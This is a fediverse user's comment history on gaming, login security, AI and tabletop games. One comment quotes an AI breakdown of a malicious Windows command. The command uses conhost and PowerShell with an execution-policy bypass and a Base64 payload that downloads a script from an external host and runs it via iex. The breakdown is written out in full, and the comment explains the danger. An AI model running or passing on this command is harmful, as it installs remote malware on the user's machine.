Pyro

joined 2 years ago
[–] Pyro@pawb.social 41 points 3 days ago (20 children)

Honestly, a small llm in these situations would be great idea, but it should be a very small local or hosted by the company itself (with a setting to turn off)

A small AI in games is the stuff I do want. But there is no reason gemni needs to be involved in a game at all

[–] Pyro@pawb.social 2 points 1 week ago

Yes, for the last Auth they had me use TOTP.

Thanks, still having my morning drink and forgot the name, When I replied.

[–] Pyro@pawb.social 8 points 1 week ago (2 children)

Fully agree, it's almost security theater.

They need to offer a way for use with a password manager, maybe a slightly hidden option or detecting a really long password to stop all the extra bits.

I forgot what the service was but it will have my user and pass, prompt the email verify, and then it will ask for the token generated in an Auth app.

At a certain point the proper user probably can't get in

[–] Pyro@pawb.social 6 points 4 months ago (1 children)

The sad thing is most the ones who would criticize it, are not the target audience. I have my gaming computer set up to be able to play to our living room when we want to. So the gabecube for me is not as good as a purchase (debating the controler though)

For someone who wants to play in their living room or about due a new gaming pc, it's going to be the best thing for them.

[–] Pyro@pawb.social -3 points 7 months ago

When getting on your personal yacht, how many attendees are needed?

[–] Pyro@pawb.social 37 points 8 months ago (5 children)

My understanding is part of it is that payment processor says stop doing it or we drop you all together. Not a we won't be involved but lose them as an avenue.

Their way or highway, no real middle ground posible

[–] Pyro@pawb.social 10 points 9 months ago* (last edited 9 months ago) (18 children)

One of the moments that Ai can be good. I asked googled gemni

This command is highly malicious and is designed to execute a script downloaded from a remote server. Here's a breakdown of what each part does:

  • conhost cmd /c: This part starts a new command prompt window (cmd) and then immediately executes the following command (/c) within it. conhost is a legitimate Windows process, but here it's being used as a wrapper.
  • powershell /ep bypass /e JABzAGkAdABlACAAPQAgAEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgACcAaAB0AHQAcwA6AC8ALwBtAGEAcwB0AHIAYQB3AC4AdABvAHAA LwBtAGUvAGQAYQB5ACcAOwAgAGkARQB4ACAAJABzAGkAdABlAA==: This is the core malicious part.
    • powershell: Invokes the PowerShell interpreter.
    • /ep bypass: This is crucial. /ep stands for "execution policy." bypass tells PowerShell to bypass its execution policy, meaning it will run any script regardless of the local security settings that might otherwise prevent untrusted scripts from running. This is a common tactic for malware.
    • /e JABzAGkAdABlACAAPQAgAEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgACcAaAB0AHQAcwA6AC8ALwBtAGEAcwB0AHIAYQBhAC4AdABvAHAA LwBtAGUvAGQAYQB5ACcAOwAgAGkARQB4ACAAJABzAGkAdABlAA==: The /e switch indicates that the following string is an encoded command. The string JABzAGkAdABlACAAPQAgAEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgACcAaAB0AHQAcwA6AC8ALwBtAGEAcwB0AHIAYQB3AC4AdABvAHAA LwBtAGUvAGQAYQB5ACcAOwAgAGkARQB4ACAAJABzAGkAdABlAA== is a Base64 encoded string. Let's decode the Base64 string to see the actual PowerShell command: Decoded PowerShell command: $site = Invoke-RestMethod 'https: //mastraw.top/me/day'; iex $site Now we can fully understand the malicious intent:
  • $site = Invoke-RestMethod '# https: //mastraw.top/me/day': This command uses Invoke-RestMethod to download content from the URL 'https://mastraw/. top/me/day' . This URL is likely hosting a malicious PowerShell script or some other form of executable code.
  • ; iex $site: The semicolon acts as a command separator. iex is an alias for Invoke-Expression. This command takes the content downloaded from 'https://mastraw.top/. /me/day' (which is stored in the $site variable) and executes it directly as a PowerShell command. In summary, this command is designed to:
  • Bypass PowerShell's security restrictions.
  • Download a script from a specific remote website '(https. ://mastraw.top/me/day)' .
  • Immediately execute that downloaded script on the victim's computer. The content of the script downloaded from' https :// mastraw.top/me/day' is unknown without accessing that URL, but given the nature of this command, it's almost certainly malicious. It could be anything from a ransomware dropper, a keylogger, a remote access trojan (RAT), or a cryptocurrency miner. If you encountered this on a computer, it is highly compromised and should be immediately isolated from the network and professionally cleaned or reimaged.

Edit:added back tick to urls

[–] Pyro@pawb.social 0 points 11 months ago (1 children)

I don't understand the corlation between hateing pedestrians (fully agree) and the self driving car

[–] Pyro@pawb.social 3 points 1 year ago

Mostly agree. They should make v1 have trends but the idea of something built like us is needed because then less alterations have to be made and it can fit with what's already around.

If you have a warehouse that uses ladders for some things easier to have a bot that can already handle that then something that needs further installation and such

[–] Pyro@pawb.social 4 points 1 year ago

It is a mine field. The fact that it can generate almost an exact copy of some things if it's over trained on an image or if the stars hit just right

On a different not llm is Large Language Model not the image generator

[–] Pyro@pawb.social 6 points 1 year ago (1 children)

I think most are focusing on the computer reading the brain. Input from a computer probably scares most people who deal with it all. A Dream in terms of what could be done but also a nightmare, "my interface is hacked and unless I give my pass codes over for my bank I can't see or hear normally"

[–] Pyro@pawb.social 20 points 1 year ago

What a fabulous upstanding person. Should have him adopt more kids, surly that would be the best thing

(I hope the /s is not needed but it's here)

 

Sharing out for my friend

25
submitted 2 years ago* (last edited 2 years ago) by Pyro@pawb.social to c/pf2general@pathfinder.social
 

To mimic what some did on reddit when the new books got out. Just got my copy of Ragoe of elements and I'll answer some questions that are in the book.

Got any questions on the lore update or the new class, hit me up!

  • Art is fantastic
  • kineticist class is as versatile as many hopped
    • light armor (maxing at master at 19)
    • class DC/attack master at 15 edit: legendary at 19
 

Was getting ready to leave for the day and I see some officers escorting a guy to the ap office. He Ran and got slammed down. Big Bag of blues or phetamine slid across the floor

view more: next ›